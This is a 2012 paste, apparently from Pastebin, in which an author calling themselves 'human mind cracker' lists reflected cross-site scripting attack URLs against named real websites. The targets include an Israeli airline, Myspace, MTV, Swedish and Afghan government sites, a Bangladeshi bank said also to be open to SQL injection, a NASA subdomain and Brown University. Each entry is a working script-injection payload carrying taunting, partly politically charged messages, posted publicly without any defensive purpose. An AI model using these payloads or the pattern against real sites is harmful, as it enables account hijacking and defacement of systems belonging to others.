human_mind_cracker

XSS by human mind cracker

Nov 3rd, 2012
1,804
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. TH3 XSS vuln work on mozilla Firefox browser :)
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8. [*]isreal airline website:
  9.  
  10. http://www.israirairlines.com/?mode=mlist&submit=thanks?message=%22%EF%BF%BD%EF%BF%BD%EF%BF%BD&email&phone&comments&firstname=%22%27%3CAH962%3E%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%20on%20isreal%20airline%20website%20We%20are%20muslim%20and%20we%20never%20give%20up%22%29%3C/script%3E
  11.  
  12. [*] Myspace website lol:
  13. http://www.myspace.com/Modules/Music/Pages/MusicHub/MusicHubVideos.aspx?genre=all-genres&chartType=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20Human%20Mind%20Cracker%20in% 20myspace%20website%20l0l%20FucK%20Th3%20$ecurity%22%29%3C/script%3E
  14.  
  15. [*]MTV website:
  16. http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&thisUrl=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20on%20MTV%20website%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
  17.  
  18. [*]Sweden government:
  19. http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?nocache=true&%3Cscript%3Ealert%28%22XSS%20vuln%20on%20Sweden%20Governement%20website%20found%20by%20Human%20Mind%20Cracker%22%29%3C/script%3E&l=en&d=%22%27%3CkapeV%3E
  20.  
  21. [*]Bangladech bank: "Also it is vuln for SQL injection"
  22. http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
  23.  
  24. [*]Nasa subdomain:
  25. http://spaceflight.nasa.gov/realdata/sightings/cities/view.cgi?country=Laos&region=None&city=%22%3Cscript%3EXSS%20vulnerabilities%20found%20by%20human%20mind%20cracker%3C/script%3E%3E%20HTTP/1.1
  26.  
  27. [*]Brown Universty website:
  28. http://library.brown.edu/gateway/lrg.php?task=db&id=%22%27%3CT3mpl%3E%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%20on%20Brown%20Universty%20Website%20lol%22%29%3C/script%3E
  29.  
  30. [*]afghanistan government website:
  31. http://president.gov.af/ps/search?q=%22%3E%3Cscript%3Ealert%28%22XSS%20found%20by%20human%20mind%20cracker%22%29%3C/script%3E
  32.  
  33. [*]Rome government:
  34. http://www.vroma.org/cgi-bin/webglimpse/var/www/html/images?age&maxchars=10000&cache=yes&query=%22%3E%3Cscript%3Ealert%28%22XSS%20found%20by%20me%20Human%20mind%20cracker%20on%20rome%20government%20website%22%29%3C/script%3E
RAW Paste Data